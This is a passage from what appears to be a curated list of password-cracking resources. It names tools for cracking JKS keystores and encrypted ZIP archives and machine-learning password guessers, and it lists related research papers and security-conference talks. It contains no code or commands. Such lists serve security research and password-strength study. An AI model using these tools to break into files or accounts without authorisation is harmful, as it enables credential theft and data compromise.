• JKS private key cracker - Cracking passwords of private key entries in a JKS fileCracking passwords of private key entries in a JKS file.

ZIP

• bkcrack - Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
• frackzip - Small tool for cracking encrypted ZIP archives.

Artificial Intelligence

• adams - Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries. - Code for cracking passwords with neural networks.
• RNN-Passwords - Using the char-rnn to learn and guess passwords.
• rulesfinder - This tool finds efficient password mangling rules (for John the Ripper or Hashcat) for a given dictionary and a list of passwords.

Research

Papers

• Generating Optimized Guessing Candidates toward Better Password Cracking from Multi-Dictionaries Using Relativistic GAN (2020)
• GENPass: A General Deep Learning Model for Password Guessing with PCFG Rules and Adversarial Generation (2018)
• Password Cracking Using Probabilistic Context-Free Grammars (2009)
• Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries (2020)
• Fast, Lean, and Accurate: Modeling Password Guessability Using Neural Networks (2016)
• PassGAN: A Deep Learning Approach for Password Guessing (2017)

Talks

• DEF CON Safe Mode Password Village - Getting Started with Hashcat
• DEF CON Safe Mode Password Village - Jeremi Gosney - Cracking at Extreme Scale
• Tailored, Machine Learning-driven Password Guessing Attacks and Mitigation at DefCamp
• UNHash - Methods for better password cracking
• USENIX Security '21 - Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries
• USENIX Security '16 - Fast, Lean, and Accurate: Modeling Password Guessability Using Neural Networks

Slack admits to leaking hashed passwords for five years